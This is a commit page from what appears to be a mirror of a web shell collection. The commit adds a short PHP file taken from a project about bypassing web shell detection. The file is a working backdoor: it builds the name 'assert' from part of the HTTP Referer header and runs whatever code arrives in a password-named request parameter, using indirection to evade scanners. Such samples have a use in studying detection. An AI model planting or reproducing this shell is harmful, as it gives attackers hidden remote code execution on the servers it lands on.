mirror of
https://github.com/tennc/webshell.git
synced 2025-12-07 21:31:29 +00:00
Add files via upload
From:https://github.com/LandGrey/webshell-detect-bypass/tree/master/webshell/php Author:Build by LandGrey
This commit is contained in:
9
php/forward_static_call_array-referer-ass.php
Normal file
9
php/forward_static_call_array-referer-ass.php
Normal file
@@ -0,0 +1,9 @@
|
||||
<?php
|
||||
/**
|
||||
* Noticed: (PHP 5 >= 5.3.0, PHP 7)
|
||||
*
|
||||
*/
|
||||
$password = "LandGrey";
|
||||
$wx = substr($_SERVER["HTTP_REFERER"],-7,-4);
|
||||
forward_static_call_array($wx."ert", array($_REQUEST[$password]));
|
||||
?>
|
||||
Reference in New Issue
Block a user